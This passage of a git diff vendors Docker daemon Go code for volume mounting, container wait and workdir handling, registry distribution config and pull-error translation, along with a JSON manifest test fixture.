+ for _, v := range hostConfig.VolumesFrom { + containerID, mode, err := volume.ParseVolumesFrom(v) + if err != nil { + return err + } + + c, err := daemon.GetContainer(containerID) + if err != nil { + return err + } + + for _, m := range c.MountPoints { + cp := &volume.MountPoint{ + Name: m.Name, + Source: m.Source, + RW: m.RW && volume.ReadWrite(mode), + Driver: m.Driver, + Destination: m.Destination, + Propagation: m.Propagation, + Spec: m.Spec, + CopyData: false, + } + + if len(cp.Source) == 0 { + v, err := daemon.volumes.GetWithRef(cp.Name, cp.Driver, container.ID) + if err != nil { + return err + } + cp.Volume = v + } + + mountPoints[cp.Destination] = cp + } + } + + // 3. Read bind mounts + for _, b := range hostConfig.Binds { + bind, err := volume.ParseMountRaw(b, hostConfig.VolumeDriver) + if err != nil { + return err + } + + // #10618 + _, tmpfsExists := hostConfig.Tmpfs[bind.Destination] + if binds[bind.Destination] || tmpfsExists { + return fmt.Errorf("Duplicate mount point '%s'", bind.Destination) + } + + if bind.Type == mounttypes.TypeVolume { + // create the volume + v, err := daemon.volumes.CreateWithRef(bind.Name, bind.Driver, container.ID, nil, nil) + if err != nil { + return err + } + bind.Volume = v + bind.Source = v.Path() + // bind.Name is an already existing volume, we need to use that here + bind.Driver = v.DriverName() + if bind.Driver == volume.DefaultDriverName { + setBindModeIfNull(bind) + } + } + + binds[bind.Destination] = true + mountPoints[bind.Destination] = bind + } + + for _, cfg := range hostConfig.Mounts { + mp, err := volume.ParseMountSpec(cfg) + if err != nil { + return dockererrors.NewBadRequestError(err) + } + + if binds[mp.Destination] { + return fmt.Errorf("Duplicate mount point '%s'", cfg.Target) + } + + if mp.Type == mounttypes.TypeVolume { + var v volume.Volume + if cfg.VolumeOptions != nil { + var driverOpts map[string]string + if cfg.VolumeOptions.DriverConfig != nil { + driverOpts = 
cfg.VolumeOptions.DriverConfig.Options + } + v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, driverOpts, cfg.VolumeOptions.Labels) + } else { + v, err = daemon.volumes.CreateWithRef(mp.Name, mp.Driver, container.ID, nil, nil) + } + if err != nil { + return err + } + + if err := label.Relabel(mp.Source, container.MountLabel, false); err != nil { + return err + } + mp.Volume = v + mp.Name = v.Name() + mp.Driver = v.DriverName() + + // only use the cached path here since getting the path is not necessary right now and calling `Path()` may be slow + if cv, ok := v.(interface { + CachedPath() string + }); ok { + mp.Source = cv.CachedPath() + } + } + + binds[mp.Destination] = true + mountPoints[mp.Destination] = mp + } + + container.Lock() + + // 4. Cleanup old volumes that are about to be reassigned. + for _, m := range mountPoints { + if m.BackwardsCompatible() { + if mp, exists := container.MountPoints[m.Destination]; exists && mp.Volume != nil { + daemon.volumes.Dereference(mp.Volume, container.ID) + } + } + } + container.MountPoints = mountPoints + + container.Unlock() + + return nil +} + +// lazyInitializeVolume initializes a mountpoint's volume if needed. +// This happens after a daemon restart. 
+func (daemon *Daemon) lazyInitializeVolume(containerID string, m *volume.MountPoint) error { + if len(m.Driver) > 0 && m.Volume == nil { + v, err := daemon.volumes.GetWithRef(m.Name, m.Driver, containerID) + if err != nil { + return err + } + m.Volume = v + } + return nil +} + +func backportMountSpec(container *container.Container) error { + for target, m := range container.MountPoints { + if m.Spec.Type != "" { + // if type is set on even one mount, no need to migrate + return nil + } + if m.Name != "" { + m.Type = mounttypes.TypeVolume + m.Spec.Type = mounttypes.TypeVolume + + // make sure this is not an anyonmous volume before setting the spec source + if _, exists := container.Config.Volumes[target]; !exists { + m.Spec.Source = m.Name + } + if container.HostConfig.VolumeDriver != "" { + m.Spec.VolumeOptions = &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{Name: container.HostConfig.VolumeDriver}, + } + } + if strings.Contains(m.Mode, "nocopy") { + if m.Spec.VolumeOptions == nil { + m.Spec.VolumeOptions = &mounttypes.VolumeOptions{} + } + m.Spec.VolumeOptions.NoCopy = true + } + } else { + m.Type = mounttypes.TypeBind + m.Spec.Type = mounttypes.TypeBind + m.Spec.Source = m.Source + if m.Propagation != "" { + m.Spec.BindOptions = &mounttypes.BindOptions{ + Propagation: m.Propagation, + } + } + } + + m.Spec.Target = m.Destination + if !m.RW { + m.Spec.ReadOnly = true + } + } + return container.ToDiskLocking() +} + +func (daemon *Daemon) traverseLocalVolumes(fn func(volume.Volume) error) error { + localVolumeDriver, err := volumedrivers.GetDriver(volume.DefaultDriverName) + if err != nil { + return fmt.Errorf("can't retrieve local volume driver: %v", err) + } + vols, err := localVolumeDriver.List() + if err != nil { + return fmt.Errorf("can't retrieve local volumes: %v", err) + } + + for _, v := range vols { + name := v.Name() + _, err := daemon.volumes.Get(name) + if err != nil { + logrus.Warnf("failed to retrieve volume %s from store: %v", name, 
err) + } + + err = fn(v) + if err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go new file mode 100644 index 0000000000..450d17f978 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go @@ -0,0 +1,39 @@ +package daemon + +import ( + "testing" + + "github.com/docker/docker/volume" +) + +func TestParseVolumesFrom(t *testing.T) { + cases := []struct { + spec string + expID string + expMode string + fail bool + }{ + {"", "", "", true}, + {"foobar", "foobar", "rw", false}, + {"foobar:rw", "foobar", "rw", false}, + {"foobar:ro", "foobar", "ro", false}, + {"foobar:baz", "", "", true}, + } + + for _, c := range cases { + id, mode, err := volume.ParseVolumesFrom(c.spec) + if c.fail { + if err == nil { + t.Fatalf("Expected error, was nil, for spec %s\n", c.spec) + } + continue + } + + if id != c.expID { + t.Fatalf("Expected id %s, was %s, for spec %s\n", c.expID, id, c.spec) + } + if mode != c.expMode { + t.Fatalf("Expected mode %s, was %s for spec %s\n", c.expMode, mode, c.spec) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix.go b/vendor/github.com/docker/docker/daemon/volumes_unix.go new file mode 100644 index 0000000000..29dffa9ea0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_unix.go @@ -0,0 +1,219 @@ +// +build !windows + +// TODO(amitkris): We need to split this file for solaris. + +package daemon + +import ( + "encoding/json" + "os" + "path/filepath" + "sort" + "strconv" + "strings" + + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/pkg/errors" +) + +// setupMounts iterates through each of the mount points for a container and +// calls Setup() on each. 
It also looks to see if is a network mount such as +// /etc/resolv.conf, and if it is not, appends it to the array of mounts. +func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) { + var mounts []container.Mount + // TODO: tmpfs mounts should be part of Mountpoints + tmpfsMounts := make(map[string]bool) + tmpfsMountInfo, err := c.TmpfsMounts() + if err != nil { + return nil, err + } + for _, m := range tmpfsMountInfo { + tmpfsMounts[m.Destination] = true + } + for _, m := range c.MountPoints { + if tmpfsMounts[m.Destination] { + continue + } + if err := daemon.lazyInitializeVolume(c.ID, m); err != nil { + return nil, err + } + rootUID, rootGID := daemon.GetRemappedUIDGID() + path, err := m.Setup(c.MountLabel, rootUID, rootGID) + if err != nil { + return nil, err + } + if !c.TrySetNetworkMount(m.Destination, path) { + mnt := container.Mount{ + Source: path, + Destination: m.Destination, + Writable: m.RW, + Propagation: string(m.Propagation), + } + if m.Volume != nil { + attributes := map[string]string{ + "driver": m.Volume.DriverName(), + "container": c.ID, + "destination": m.Destination, + "read/write": strconv.FormatBool(m.RW), + "propagation": string(m.Propagation), + } + daemon.LogVolumeEvent(m.Volume.Name(), "mount", attributes) + } + mounts = append(mounts, mnt) + } + } + + mounts = sortMounts(mounts) + netMounts := c.NetworkMounts() + // if we are going to mount any of the network files from container + // metadata, the ownership must be set properly for potential container + // remapped root (user namespaces) + rootUID, rootGID := daemon.GetRemappedUIDGID() + for _, mount := range netMounts { + if err := os.Chown(mount.Source, rootUID, rootGID); err != nil { + return nil, err + } + } + return append(mounts, netMounts...), nil +} + +// sortMounts sorts an array of mounts in lexicographic order. This ensure that +// when mounting, the mounts don't shadow other mounts. 
For example, if mounting +// /etc and /etc/resolv.conf, /etc/resolv.conf must not be mounted first. +func sortMounts(m []container.Mount) []container.Mount { + sort.Sort(mounts(m)) + return m +} + +// setBindModeIfNull is platform specific processing to ensure the +// shared mode is set to 'z' if it is null. This is called in the case +// of processing a named volume and not a typical bind. +func setBindModeIfNull(bind *volume.MountPoint) { + if bind.Mode == "" { + bind.Mode = "z" + } +} + +// migrateVolume links the contents of a volume created pre Docker 1.7 +// into the location expected by the local driver. +// It creates a symlink from DOCKER_ROOT/vfs/dir/VOLUME_ID to DOCKER_ROOT/volumes/VOLUME_ID/_container_data. +// It preserves the volume json configuration generated pre Docker 1.7 to be able to +// downgrade from Docker 1.7 to Docker 1.6 without losing volume compatibility. +func migrateVolume(id, vfs string) error { + l, err := volumedrivers.GetDriver(volume.DefaultDriverName) + if err != nil { + return err + } + + newDataPath := l.(*local.Root).DataPath(id) + fi, err := os.Stat(newDataPath) + if err != nil && !os.IsNotExist(err) { + return err + } + + if fi != nil && fi.IsDir() { + return nil + } + + return os.Symlink(vfs, newDataPath) +} + +// verifyVolumesInfo ports volumes configured for the containers pre docker 1.7. +// It reads the container configuration and creates valid mount points for the old volumes. +func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { + // Inspect old structures only when we're upgrading from old versions + // to versions >= 1.7 and the MountPoints has not been populated with volumes data. 
+ type volumes struct { + Volumes map[string]string + VolumesRW map[string]bool + } + cfgPath, err := container.ConfigPath() + if err != nil { + return err + } + f, err := os.Open(cfgPath) + if err != nil { + return errors.Wrap(err, "could not open container config") + } + defer f.Close() + var cv volumes + if err := json.NewDecoder(f).Decode(&cv); err != nil { + return errors.Wrap(err, "could not decode container config") + } + + if len(container.MountPoints) == 0 && len(cv.Volumes) > 0 { + for destination, hostPath := range cv.Volumes { + vfsPath := filepath.Join(daemon.root, "vfs", "dir") + rw := cv.VolumesRW != nil && cv.VolumesRW[destination] + + if strings.HasPrefix(hostPath, vfsPath) { + id := filepath.Base(hostPath) + v, err := daemon.volumes.CreateWithRef(id, volume.DefaultDriverName, container.ID, nil, nil) + if err != nil { + return err + } + if err := migrateVolume(id, hostPath); err != nil { + return err + } + container.AddMountPointWithVolume(destination, v, true) + } else { // Bind mount + m := volume.MountPoint{Source: hostPath, Destination: destination, RW: rw} + container.MountPoints[destination] = &m + } + } + return container.ToDisk() + } + return nil +} + +func (daemon *Daemon) mountVolumes(container *container.Container) error { + mounts, err := daemon.setupMounts(container) + if err != nil { + return err + } + + for _, m := range mounts { + dest, err := container.GetResourcePath(m.Destination) + if err != nil { + return err + } + + var stat os.FileInfo + stat, err = os.Stat(m.Source) + if err != nil { + return err + } + if err = fileutils.CreateIfNotExists(dest, stat.IsDir()); err != nil { + return err + } + + opts := "rbind,ro" + if m.Writable { + opts = "rbind,rw" + } + + if err := mount.Mount(m.Source, dest, bindMountType, opts); err != nil { + return err + } + + // mountVolumes() seems to be called for temporary mounts + // outside the container. 
Soon these will be unmounted with + // lazy unmount option and given we have mounted the rbind, + // all the submounts will propagate if these are shared. If + // daemon is running in host namespace and has / as shared + // then these unmounts will propagate and unmount original + // mount as well. So make all these mounts rprivate. + // Do not use propagation property of volume as that should + // apply only when mounting happen inside the container. + if err := mount.MakeRPrivate(dest); err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_windows.go b/vendor/github.com/docker/docker/daemon/volumes_windows.go new file mode 100644 index 0000000000..bf7fc478a1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_windows.go @@ -0,0 +1,47 @@ +// +build windows + +package daemon + +import ( + "sort" + + "github.com/docker/docker/container" + "github.com/docker/docker/volume" +) + +// setupMounts configures the mount points for a container by appending each +// of the configured mounts on the container to the OCI mount structure +// which will ultimately be passed into the oci runtime during container creation. +// It also ensures each of the mounts are lexographically sorted. + +// BUGBUG TODO Windows containerd. This would be much better if it returned +// an array of runtime spec mounts, not container mounts. Then no need to +// do multiple transitions. 
+ +func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) { + var mnts []container.Mount + for _, mount := range c.MountPoints { // type is volume.MountPoint + if err := daemon.lazyInitializeVolume(c.ID, mount); err != nil { + return nil, err + } + s, err := mount.Setup(c.MountLabel, 0, 0) + if err != nil { + return nil, err + } + + mnts = append(mnts, container.Mount{ + Source: s, + Destination: mount.Destination, + Writable: mount.RW, + }) + } + + sort.Sort(mounts(mnts)) + return mnts, nil +} + +// setBindModeIfNull is platform specific processing which is a no-op on +// Windows. +func setBindModeIfNull(bind *volume.MountPoint) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/wait.go b/vendor/github.com/docker/docker/daemon/wait.go new file mode 100644 index 0000000000..2dab22e991 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/wait.go @@ -0,0 +1,32 @@ +package daemon + +import ( + "time" + + "golang.org/x/net/context" +) + +// ContainerWait stops processing until the given container is +// stopped. If the container is not found, an error is returned. On a +// successful stop, the exit code of the container is returned. On a +// timeout, an error is returned. If you want to wait forever, supply +// a negative duration for the timeout. +func (daemon *Daemon) ContainerWait(name string, timeout time.Duration) (int, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return -1, err + } + + return container.WaitStop(timeout) +} + +// ContainerWaitWithContext returns a channel where exit code is sent +// when container stops. Channel can be cancelled with a context. 
+func (daemon *Daemon) ContainerWaitWithContext(ctx context.Context, name string) error {
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	return container.WaitWithContext(ctx)
+}
diff --git a/vendor/github.com/docker/docker/daemon/workdir.go b/vendor/github.com/docker/docker/daemon/workdir.go
new file mode 100644
index 0000000000..5bd0d0caca
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/workdir.go
@@ -0,0 +1,21 @@
+package daemon
+
+// ContainerCreateWorkdir creates the working directory. This solves the
+// issue arising from https://github.com/docker/docker/issues/27545,
+// which was initially fixed by https://github.com/docker/docker/pull/27884. But that fix
+// was too expensive in terms of performance on Windows. Instead,
+// https://github.com/docker/docker/pull/28514 introduces this new functionality
+// where the builder calls into the backend here to create the working directory.
+func (daemon *Daemon) ContainerCreateWorkdir(cID string) error {
+	container, err := daemon.GetContainer(cID)
+	if err != nil {
+		return err
+	}
+	err = daemon.Mount(container)
+	if err != nil {
+		return err
+	}
+	defer daemon.Unmount(container)
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	return container.SetupWorkingDirectory(rootUID, rootGID)
+}
diff --git a/vendor/github.com/docker/docker/distribution/config.go b/vendor/github.com/docker/docker/distribution/config.go
new file mode 100644
index 0000000000..bfea8b0336
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/config.go
@@ -0,0 +1,241 @@
+package distribution
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"runtime"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+ "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/libtrust" + "golang.org/x/net/context" +) + +// Config stores configuration for communicating +// with a registry. +type Config struct { + // MetaHeaders stores HTTP headers with metadata about the image + MetaHeaders map[string][]string + // AuthConfig holds authentication credentials for authenticating with + // the registry. + AuthConfig *types.AuthConfig + // ProgressOutput is the interface for showing the status of the pull + // operation. + ProgressOutput progress.Output + // RegistryService is the registry service to use for TLS configuration + // and endpoint lookup. + RegistryService registry.Service + // ImageEventLogger notifies events for a given image + ImageEventLogger func(id, name, action string) + // MetadataStore is the storage backend for distribution-specific + // metadata. + MetadataStore metadata.Store + // ImageStore manages images. + ImageStore ImageConfigStore + // ReferenceStore manages tags. This value is optional, when excluded + // content will not be tagged. + ReferenceStore reference.Store + // RequireSchema2 ensures that only schema2 manifests are used. + RequireSchema2 bool +} + +// ImagePullConfig stores pull configuration. +type ImagePullConfig struct { + Config + + // DownloadManager manages concurrent pulls. + DownloadManager RootFSDownloadManager + // Schema2Types is the valid schema2 configuration types allowed + // by the pull operation. + Schema2Types []string +} + +// ImagePushConfig stores push configuration. +type ImagePushConfig struct { + Config + + // ConfigMediaType is the configuration media type for + // schema2 manifests. + ConfigMediaType string + // LayerStore manages layers. + LayerStore PushLayerProvider + // TrustKey is the private key for legacy signatures. This is typically + // an ephemeral key, since these signatures are no longer verified. 
+ TrustKey libtrust.PrivateKey + // UploadManager dispatches uploads. + UploadManager *xfer.LayerUploadManager +} + +// ImageConfigStore handles storing and getting image configurations +// by digest. Allows getting an image configurations rootfs from the +// configuration. +type ImageConfigStore interface { + Put([]byte) (digest.Digest, error) + Get(digest.Digest) ([]byte, error) + RootFSFromConfig([]byte) (*image.RootFS, error) +} + +// PushLayerProvider provides layers to be pushed by ChainID. +type PushLayerProvider interface { + Get(layer.ChainID) (PushLayer, error) +} + +// PushLayer is a pushable layer with metadata about the layer +// and access to the content of the layer. +type PushLayer interface { + ChainID() layer.ChainID + DiffID() layer.DiffID + Parent() PushLayer + Open() (io.ReadCloser, error) + Size() (int64, error) + MediaType() string + Release() +} + +// RootFSDownloadManager handles downloading of the rootfs +type RootFSDownloadManager interface { + // Download downloads the layers into the given initial rootfs and + // returns the final rootfs. + // Given progress output to track download progress + // Returns function to release download resources + Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) +} + +type imageConfigStore struct { + image.Store +} + +// NewImageConfigStoreFromStore returns an ImageConfigStore backed +// by an image.Store for container images. 
+func NewImageConfigStoreFromStore(is image.Store) ImageConfigStore { + return &imageConfigStore{ + Store: is, + } +} + +func (s *imageConfigStore) Put(c []byte) (digest.Digest, error) { + id, err := s.Store.Create(c) + return digest.Digest(id), err +} + +func (s *imageConfigStore) Get(d digest.Digest) ([]byte, error) { + img, err := s.Store.Get(image.IDFromDigest(d)) + if err != nil { + return nil, err + } + return img.RawJSON(), nil +} + +func (s *imageConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { + var unmarshalledConfig image.Image + if err := json.Unmarshal(c, &unmarshalledConfig); err != nil { + return nil, err + } + + // fail immediately on windows + if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" { + return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS) + } + + return unmarshalledConfig.RootFS, nil +} + +type storeLayerProvider struct { + ls layer.Store +} + +// NewLayerProviderFromStore returns a layer provider backed by +// an instance of LayerStore. Only getting layers as gzipped +// tars is supported. 
+func NewLayerProviderFromStore(ls layer.Store) PushLayerProvider { + return &storeLayerProvider{ + ls: ls, + } +} + +func (p *storeLayerProvider) Get(lid layer.ChainID) (PushLayer, error) { + if lid == "" { + return &storeLayer{ + Layer: layer.EmptyLayer, + }, nil + } + l, err := p.ls.Get(lid) + if err != nil { + return nil, err + } + + sl := storeLayer{ + Layer: l, + ls: p.ls, + } + if d, ok := l.(distribution.Describable); ok { + return &describableStoreLayer{ + storeLayer: sl, + describable: d, + }, nil + } + + return &sl, nil +} + +type storeLayer struct { + layer.Layer + ls layer.Store +} + +func (l *storeLayer) Parent() PushLayer { + p := l.Layer.Parent() + if p == nil { + return nil + } + sl := storeLayer{ + Layer: p, + ls: l.ls, + } + if d, ok := p.(distribution.Describable); ok { + return &describableStoreLayer{ + storeLayer: sl, + describable: d, + } + } + + return &sl +} + +func (l *storeLayer) Open() (io.ReadCloser, error) { + return l.Layer.TarStream() +} + +func (l *storeLayer) Size() (int64, error) { + return l.Layer.DiffSize() +} + +func (l *storeLayer) MediaType() string { + // layer store always returns uncompressed tars + return schema2.MediaTypeUncompressedLayer +} + +func (l *storeLayer) Release() { + if l.ls != nil { + layer.ReleaseAndLog(l.ls, l.Layer) + } +} + +type describableStoreLayer struct { + storeLayer + describable distribution.Describable +} + +func (l *describableStoreLayer) Descriptor() distribution.Descriptor { + return l.describable.Descriptor() +} diff --git a/vendor/github.com/docker/docker/distribution/errors.go b/vendor/github.com/docker/docker/distribution/errors.go new file mode 100644 index 0000000000..b8cf9fb9e8 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/errors.go @@ -0,0 +1,159 @@ +package distribution + +import ( + "net/url" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/registry/api/errcode" + 
"github.com/docker/distribution/registry/api/v2" + "github.com/docker/distribution/registry/client" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/reference" + "github.com/pkg/errors" +) + +// ErrNoSupport is an error type used for errors indicating that an operation +// is not supported. It encapsulates a more specific error. +type ErrNoSupport struct{ Err error } + +func (e ErrNoSupport) Error() string { + if e.Err == nil { + return "not supported" + } + return e.Err.Error() +} + +// fallbackError wraps an error that can possibly allow fallback to a different +// endpoint. +type fallbackError struct { + // err is the error being wrapped. + err error + // confirmedV2 is set to true if it was confirmed that the registry + // supports the v2 protocol. This is used to limit fallbacks to the v1 + // protocol. + confirmedV2 bool + // transportOK is set to true if we managed to speak HTTP with the + // registry. This confirms that we're using appropriate TLS settings + // (or lack of TLS). + transportOK bool +} + +// Error renders the FallbackError as a string. +func (f fallbackError) Error() string { + return f.Cause().Error() +} + +func (f fallbackError) Cause() error { + return f.err +} + +// shouldV2Fallback returns true if this error is a reason to fall back to v1. +func shouldV2Fallback(err errcode.Error) bool { + switch err.Code { + case errcode.ErrorCodeUnauthorized, v2.ErrorCodeManifestUnknown, v2.ErrorCodeNameUnknown: + return true + } + return false +} + +// TranslatePullError is used to convert an error from a registry pull +// operation to an error representing the entire pull operation. Any error +// information which is not used by the returned error gets output to +// log at info level. 
+func TranslatePullError(err error, ref reference.Named) error { + switch v := err.(type) { + case errcode.Errors: + if len(v) != 0 { + for _, extra := range v[1:] { + logrus.Infof("Ignoring extra error returned from registry: %v", extra) + } + return TranslatePullError(v[0], ref) + } + case errcode.Error: + var newErr error + switch v.Code { + case errcode.ErrorCodeDenied: + // ErrorCodeDenied is used when access to the repository was denied + newErr = errors.Errorf("repository %s not found: does not exist or no pull access", ref.Name()) + case v2.ErrorCodeManifestUnknown: + newErr = errors.Errorf("manifest for %s not found", ref.String()) + case v2.ErrorCodeNameUnknown: + newErr = errors.Errorf("repository %s not found", ref.Name()) + } + if newErr != nil { + logrus.Infof("Translating %q to %q", err, newErr) + return newErr + } + case xfer.DoNotRetry: + return TranslatePullError(v.Err, ref) + } + + return err +} + +// continueOnError returns true if we should fallback to the next endpoint +// as a result of this error. +func continueOnError(err error) bool { + switch v := err.(type) { + case errcode.Errors: + if len(v) == 0 { + return true + } + return continueOnError(v[0]) + case ErrNoSupport: + return continueOnError(v.Err) + case errcode.Error: + return shouldV2Fallback(v) + case *client.UnexpectedHTTPResponseError: + return true + case ImageConfigPullError: + return false + case error: + return !strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) + } + // let's be nice and fallback if the error is a completely + // unexpected one. + // If new errors have to be handled in some way, please + // add them to the switch above. + return true +} + +// retryOnError wraps the error in xfer.DoNotRetry if we should not retry the +// operation after this error. 
+func retryOnError(err error) error { + switch v := err.(type) { + case errcode.Errors: + if len(v) != 0 { + return retryOnError(v[0]) + } + case errcode.Error: + switch v.Code { + case errcode.ErrorCodeUnauthorized, errcode.ErrorCodeUnsupported, errcode.ErrorCodeDenied, errcode.ErrorCodeTooManyRequests, v2.ErrorCodeNameUnknown: + return xfer.DoNotRetry{Err: err} + } + case *url.Error: + switch v.Err { + case auth.ErrNoBasicAuthCredentials, auth.ErrNoToken: + return xfer.DoNotRetry{Err: v.Err} + } + return retryOnError(v.Err) + case *client.UnexpectedHTTPResponseError: + return xfer.DoNotRetry{Err: err} + case error: + if err == distribution.ErrBlobUnknown { + return xfer.DoNotRetry{Err: err} + } + if strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) { + return xfer.DoNotRetry{Err: err} + } + } + // let's be nice and fallback if the error is a completely + // unexpected one. + // If new errors have to be handled in some way, please + // add them to the switch above. 
+ return err +} diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest new file mode 100644 index 0000000000..a1f02a62a3 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest @@ -0,0 +1,38 @@ +{ + "schemaVersion": 2, + "name": "library/hello-world", + "tag": "latest", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "history": [ + { + "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD 
[\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n" + }, + { + "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in 
/\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4", + "kty": "EC", + "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ", + "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8" + }, + "alg": "ES256" + }, + "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A", + "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ" + } + ] +} diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest new file mode 100644 index 0000000000..beec19a801 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest @@ -0,0 +1,46 @@ +{ + 